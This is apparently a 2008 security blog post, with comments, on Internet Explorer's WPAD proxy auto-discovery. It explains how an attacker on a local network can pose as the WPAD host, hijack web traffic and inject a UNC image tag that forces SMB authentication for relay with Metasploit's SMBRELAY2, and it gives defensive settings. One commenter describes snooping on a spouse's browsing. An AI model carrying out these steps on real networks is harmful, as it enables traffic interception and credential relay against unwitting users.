WPAD: Internet Explorer’s Worst Feature
If you run Internet Explorer, you may have noticed that often when you first load up IE and try to navigate to a web page, there’s a delay of a few seconds longer than there is on subsequent page loads. This is because IE is trying to automatically detect your proxy settings. Inside Internet Options -> Connections -> LAN Settings, you’ll find an option called “Automatically detect settings” which defaults to on. Unless you’ve turned it off manually or are joined to a corporate domain that turns it off, it’s probably still on.
It turns out that this settings is absolutely appalling for security, opening up several opportunities for an enterprising hacker on your local network. On a corporate network, that may be everyone in the building — on a wireless hotspot, it’s anyone in range. To understand the vulnerability, we have to look at how Automatically Detect Settings actually detects your settings.
When IE is first requested to load a page, it attempts to locate a server called WPAD. First, it checks the information received from the DHCP server, looking for site-local option 252, “auto-proxy-config.” Failing this, it tries to do this with a DNS lookup, asking the local DNS server to identify the IP address for WPAD. If this doesn’t work, it proceeds to try to use WINS — the old NetBIOS-based Windows Internet Name Service that is how multiple computers on a home network identify each other in the absence of a DNS server — to identify WPAD. It will try this for each domain extension up the hierarchy — if your computer is called fnord.endor.sparkplug.squid.com, it will look for, in order:
- wpad.endor.sparkplug.squid.com
- wpad.sparkplug.squid.com
- wpad.squid.com
It should not try to load from wpad.com (or wpad.net, etc.), though some configuration errors can cause it to try. In any case, if it finds a server called WPAD, it tries to retrieve proxy data from it, by issuing:
GET /wpad.dat HTTP/1.0
This is called the Web Proxy Auto Discovery Protocol, from which WPAD gets its name. The resulting file wpad.dat must be returned with the MIME type “application/x-ns-proxy-autoconfig”, and contain JavaScript that implements a function called FindProxyForUrl. This function is then called by IE on every URL it tries to load from then on, to determine what proxy servers, if any, it should use. The simplest example of this file could be something like this:
function FindProxyForUrl(url, host)
{
return “PROXY isa.squid.com:80; DIRECT”;
}
This tells IE to use the same proxy for everything, and that if that fails, try a direct connection. An enterprise with multiple proxies and internal networks could use the URL and HOST parameters to do a more complex proxy configuration. This file is actually in the Netscape Proxy Client Autoconfig file format, and can contain quite a bit of interesting script.
So, in a large enterprise, this is all very convenient. As the network administrator, you can control the proxy configuration of everyone on the network from one convenient file. Should you need to change anything, you change it in one place and it gets picked up. Most enterprises don’t use this feature — I’ve heard that only about 3% do — because they instead distribute proxy settings via domain Group Policy, or they simply don’t use a proxy at all. However, the few enterprises that do are some of Microsoft’s largest customers, so this feature probably has some very influential people backing it.
So, what’s the problem with this? Why do I think of it as IE’s worst feature? Because in those 90%+ of enterprises and effectively-100% of non-enterprise networks that don’t use WPAD, you can use it to mount man-in-the-middle attacks and hijack everyone’s web traffic. If someone is using you as a proxy, you have total control over their web activity. You can read everything they do, everything that the server responds with, etc. You can redirect any web traffic transparently to your own fake sites. You can even modify the responses from real sites on-the-fly with scripts — there are proxy servers for Linux that will run everything that goes through it through some user-specified regular expressions to edit them. The classic demonstration of this was a user who set up his proxy to replace all image loads on all web pages with upside-down versions of the images or random cute cat pictures from www.kittenwar.com; you can see his proxy configuration at ex-parrot.com. You can even intercept SSL communications this way, though the user will get an error message that the URL on the certificate doesn’t match the site certificate (or, if you’re more careful about crafting the cert, simply that the certificate isn’t signed by a trusted authority.)
WPAD can enable you to take control of others’ proxy settings. How? Simple… just name your computer WPAD and join a network. Anyone who uses Internet Explorer will ask your computer for the GetProxyForUrl function. All you have to do is run a web server containing a file called wpad.dat at the root, and configure the server to return that file with a MIME type of “application/x-ns-proxy-autoconfig”. That file can contain a line making your computer the proxy for all URLs, and now you get everyone’s web traffic.
Normally, just registering with DHCP with a computer name of “WPAD” is enough to get you into DNS and hijack the entire network. Failing that, even if DNS is restricted, if WPAD doesn’t exist other systems will still find you based on WINS (which is decentralized and unauthenticated, and thus cannot be restricted.) And even if WPAD does exist, this feature is still scary — an attacker can still get their system named WPAD via a host of mechanisms, like DNS cache poisoning, ARP spoofing, rogue access points, etc.
But wait, it gets worse! By carrying out this attack, the attacker has the ability to make you execute arbitrary web-safe code (i.e. anything your browser will do without prompting.) After all, they can edit any page you view and add script to it. What if they add script like this?
<img src=”\\wpad\share\image.gif”>
Note that that’s a UNC path (Windows file sharing), not an HTTP path. Your computer will try to download that image via SMB — and since the attacker is on your local network, SMB will be successfully routed to him. Now, if he’s got a public share called “share” hosting an image called “image.gif”, this is no big deal — IE will simply display the image. But what if his machine doesn’t have shares at all, but instead a Metasploit console running my favorite Metasploit module, SMBRELAY2? Then each time a user accesses any web page, the attacker gains access to one resource of his choice as the user who loaded the web page. Every time you browse the web, the attacker gets to take an action with your credentials — including connecting back to your computer with your privileges (probably Administrator, if you’re like most people) or to any other share or website you have access to with your Windows credentials. The attacker doesn’t actually get your password — he just probably doesn’t need it, since he can act as you anyway.
Actually, an attacker can do everything I described above using only a standard Linux box with a Metasploit installation (or a BackTrack 3 LiveCD.)
So, what can you do to protect yourself or your network from this attack? As an end-user, it’s pretty simple — go into your IE or Firefox or other browser settings and disable proxy autodetection. You probably don’t need it anyway, and it slows down your first page load. If you use a network that does require a proxy, find out what the proxy is and enter its settings manually. The only reason you wouldn’t be able to do this is if you are joined to a domain that sets this setting to On via domain Group Policy, or if you run the ISA Firewall Client with the option “Enable Web Browser Automatic Configuration” enabled (in which case you can just disable that setting, too.)
As a network administrator, it’s a bit harder. If your network does not use WPAD, you could force autodetection off with Group Policy. If you do use it, make sure you have a machine registered as WPAD at each domain level and in both DNS and WINS, and specify the machine (preferably by IP address) in DHCP option 252. If a system gets the WPAD address out of DHCP, it will make no attempt to find it in other ways, which greatly reduces the opportunity for spoofing.
The ultimate solution to this would be for Microsoft to make it off by default. Unfortunately, as an automation-simplification feature, having it off by default would pretty much defeat its purpose.
If you enjoyed this post, please consider to leave a comment or subscribe to the feed and get future articles delivered to your feed reader.
[...] from a network. The Web Proxy Auto Discovery (WPAD) protocol provides browsers (primarily Windows Internet Explorer, and maybe others) with a proxy configuration file. This Proxy Auto-Config (PAC) file can configure [...]
So am I correct in saying that the exploits you are reffering to are for all intents and purposes, elliminated if you DO use wpad in your enterprise network? (entries being in DHCP and DNS).
- JS
If you specify the location of WPAD using the DHCP auto-proxy-config option, your network is relatively secure against this sort of attack (i.e. secure enough that an attacker is likely to use another avenue altogether rather than doing the sort of thing it would require to get past this, such as spoofing DHCP or playing games with ARPs.)
The problem isn’t so much with corporate networks. The problem is more that these laptops from corporate networks are all set up to rely on WPAD for proxy information, and then people carry them off to other networks, like open wireless, with those same configuration settings intact. Suddenly, they’re asking for WPAD on networks that are potentially hostile.
Hi Grant,
interesting post, but have you ever managed to make this work? I haven’t seen any article describing how it work. I’m a pentester but for some reason the attack in not working in my test environment.
Hello, has something changed in IE recently, I first discovered wpad because I was playing around with wireshark and wanted to know what wpad is. I’ve gone into connections, Lan Connections and everything is unchecked, yet it is always showing up in wireshark. Is there any other way to shut it down?
I’m not aware of any changes; in IE8 there’s still the usual “Automatically Detect Settings” box in Internet Options, which should still toggle WPAD usage on and off. It’s possible that IE still looks for the PAC file even if it doesn’t intend to use it, though I admit that would be somewhat bizarre behavior. I’ll have to look into it.
In my investigation, I found that Vista does attempt to download the WPAD file regardless of the browser setting. I have both Firefox and IE 7 with autodiscovery disabled, but still Vista is looking for WPAD on initial startup of my network connection (verified with wireshark).
I have investigated a large number of articles and comments to try to find a solution, and unfortunately, none that I’ve found fully stop the problem. The best solution I found was to set my computer’s name to WPAD, and thus limit the number of DNS queries that are attempting to locate the WPAD server. Now, it’ll only query the following:
WPAD.XXXX.YYYYY.COM
and then
XXXX.YYYYY.COM
(where XXXX.YYYYY is my ISP’s domain name).
Before this change, I have a lot of queries for various forms of WPAD addresses, which didn’t exist. I tried to disable devolution as mentioned in …
http://www.microsoft.com/technet/security/advisory/945713.mspx
… but it DID NOT WORK. According to the advisory, I should be able to disable devolution by setting the following registry entry to 0 (FALSE):
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\UseDomainNameDevolution
It didn’t work. Using ProcessMonitor, I also tracked down two different registry entries for devolution that my system was accessing prior to devolution, and neither stopped devolution. It must be hardcoded.
I have a small update. I have successfully disabled the Vista service “WinHTTP Web Proxy Auto-Discovery Service” and I believe I have finally stopped the implementation of the Web Proxy Auto-Discovery (WPAD) protocol.
As of now, I’m not sure what side effects I’ll encounter. Disabling this service may also impact COM Automation and the Win32 API components for sending and receiving HTTP requests from applications. Actually, I might like this since I really don’t like apps accessing the web without my control. My browser still works … that’s good! Well see.
By the way, with Wireshark I now see a lot of different activity on initialization of my internet connection. I need to look into this….
I understand the countermeasures for IE attacks, but how can you detect an attack against Internet Explorer over SSL?
I’m not quite sure what sort of attacks against IE “over SSL” you mean. There have, in the past, been attacks against browsers by embedding faulty strings designed to cause buffer overruns directly into the X.509 certificate — the only defenses against these are running a fully-patched browsers (to my knowledge, there are no known attacks of this type that still work on current versions of any major browser) and being cautious as to what you browse to. If you mean simply being attacked by an SSL site (e.g. embedded malware), it’s once again the same mitigations — avoid sites that are often malicious (e.g. warez) and use a current browser. The only thing SSL affects is that network-based IDS systems will not protect you in the case of an SSL site, since they can’t read the encrypted traffic — you’re reliant on host-based protection like anti-virus or anti-spyware software on your own computer. Of course, most people aren’t browsing behind a NIDS anyway, so this is no change unless you’re in a corporate environment.
On the other hand, if you mean attacks not against IE but against SSL itself, such as Moxie’s SSLSniff, they’re hard to detect. One thing that helps is actually opening and verifying the certificate — just because the padlock icon is there doesn’t mean you’re communicating with what you think you’re communicating with. Most of the time attackers don’t forge an entire certificate, just the domain name, so everything else may look wrong (or the certificate may be for * rather than a specific domain.) Once again, use a current, fully-patched browser, as this protects you from null-byte certificates (which actually may look perfect if you inspect them.) And most importantly of all, don’t use insecure wireless networks. Attacks like SSLSniff rely on being a man-in-the-middle — that is, an attacker must be able not just to read your communication but also to modify it. This means either he has to control a router between you and the website you’re talking to, or he has to be on a wireless network with you. The only safe thing to do on an insecure (open or WEP) wireless network is to VPN to a secure network. Anything else is vulnerable.
Not sure how this is any more serious than someone attempting a basic man-in-the-middle attack using ARP poisoning or DNS poisening…
I did it the other day to my wife’s computer with Cain and Able, noticing that she was looking at more shoes to buy… Didn’t need to hijack her WPAD queries or DNS lookups to accomplish this task.
What WPAD does provide is the ability to have users dynamically find a proxy server. And the users don’t have to know anything about manually configuring (and enabling/disabling) a hard coded proxy server.
Security, as you obviously know, is a balance between functionality and safety. The only truly secure client is one that is turned off…
So this is really just another example of where it is up to the individual/management to determine if the risk of web hijacking outweighs the cost of manually managing the proxy configuration.
From my experience the WPAD feature is not used because of a general lack of knowledge and understanding on the technology. After all, it’s easy to slam in a proxy server with GPO’s…
Thanks so much for explaining more on the wpad. I have been battling this “connecting to wpad.localdomain” login box in IE for a while now, not really understanding what wpad is and does. This article explained it in perfect detail in order for me to continue on with my development. As it was, the connection box would pop up 3 times for every web page load or httpRequest that was being made.
Thank you for saving what hair I haven’t pulled out yet.
[...] Security info about WPAD and Man In the Middle Attacks. http://perimetergrid.com/wp/2008/01/11/wpad-internet-explorers-worst-feature/ [...]
[...] http://perimetergrid.com/wp/2008/01/11/wpad-internet-explorers-worst-feature/ [...]
Thank you for the information on WPAD it helped .
It is hard to get worked up over this. If you are using DHCP your network is already insecure. Anyone who can plug-in a machine into your network can add a DHCP server. The first server to respond wins. BTW. Firefox, and Chrome also support wpad, so I’m not sure how this is an IE problem.
I disconnected and then re-plugged my WiMAX modem and then router – that’s the solution in my circumstance against the perennial slow speeds I get from my ISP here in PH. I left my laptop for a while because the modem takes its sweet time to finally negotiate internet access. Then I came back to my laptop, I found this dialog box something like ” The server at wpad.localdomain requires authentication “. I’ve encounter similar boxes when doing the modem+Router reset – while internet access is not yet established, it seems the router returns itself as any website requested and thus you have to provide authentication.
And thus googling for that led me here. And I’m using IE10 on Win7 x86 now. By the way this is the first time I am encountering wpad.localdomain and I think Windows Media Center is the culprit – it’s the only Microsoft program I’m running at the moment (of course, the background processes are another story).